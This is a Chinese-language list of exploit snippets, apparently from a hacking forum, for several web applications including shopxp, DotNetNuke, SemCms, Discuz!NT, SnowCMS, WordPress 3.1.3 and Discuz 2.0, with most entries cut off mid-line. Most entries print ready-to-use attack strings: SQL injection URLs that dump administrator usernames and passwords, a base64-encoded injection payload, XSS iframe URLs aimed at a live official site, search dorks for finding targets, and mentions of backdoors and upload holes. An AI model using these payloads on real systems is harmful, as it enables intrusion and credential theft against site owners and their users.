shopxp网上购物系统v7.4爆密码0day
洞版本:shopxp网上购物系统 v7.4 关键词:inurl:shopxp_news.aspshopxp_news.asp后台shopxp_admin暴密码的语句:/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4
DotNetNuke多个0day
受影响版本:DotNetNuke 5.x其他版本可能也存在该问题[+] Application: DotNetNuke[+] Affected Version: version prior to 5.x[+] Vendor’s URL: http://www.dotnetnuke.com/[+] Bug Type: Privilege escalat
深喉cms系统一个垃圾命令执行缺陷
简要描述:一个垃圾的命令执行,只能执行一个不带参数的函数,请自行挖掘详细说明:$controller=ABSPATH.'/content/'.$params['model'].'/index.php'; //die($controller); //载入调用标签 if(file_exists(ABS
睿拓旅游信息门户系统 1.1 注入漏洞
睿拓旅游信息门户系统是永州睿拓旅游信息网站管理系统包括了企业网站常用的各种功能,带完整的后台管理系统,本程序无任何功能限制下载即可使用 源码下载:http://www.mycodes.net/19/2714.htm 工具:阿D,明小子等 加表
奶茶加盟店网站源码 1.0 注入漏洞+后门
默认后台:admin/admin_login.asp 源码下载:http://www.mycodes.net/25/4540.htm exp:union select 1,txqpass,3,4,5,txqname,7,8,9 from admin test:http://localhost/brand.asp?a_flid=1 union select 1,txqpass,3,4
SemCms外贸网站管理系统 cookie 注入漏洞
SemCms是一套开源外贸企业网站管理系统,主要用于外贸企业,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器。SemCms使用vbscript语言编写,结合iis运行。 源码下载:http://www.mycodes.net/25/2093.htm 默认后
Discuz!NT3.6 跨站漏洞官网测试
登录框提交用户名和密码的时候存在跨站漏洞 http://nt.discuz.net/login.aspx?postusername=%22%3E%3Ciframe%20src=%22http://www.haik8.com%22%3E http://nt.discuz.net/invite.aspx?usersaid=%3Ciframe%20src=%22h
SnowCMS3.0 那年下雪网站程序 上传漏洞
其实这个程序是一个人人网站,整体看起来蛮漂亮的。可惜作者早已不在更新.成因我也懒得说了.主要是上传漏洞.NO.1 http://127.0.0.1/Fso_file.asp 密码:admin 和大马差不多NO.2 双文件上传页面:http://127.0.0.1/adm
WordPress 3.1.3 注入漏洞
1. taxonomy.php 没有正确验证用户输入,允许攻击者构建任意sql命令,可用于盲注。 http://localhost/wp-admin/edit-tags.php?taxonomy=link_category&orderby=[SQLinjection] &order=[SQL injection]http://localh
DZ 2.0 直接暴管理账号密码
DZ 2.0 直接暴管理账号密码 http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd29yZCkgZnJvbSBwcmVfY29t
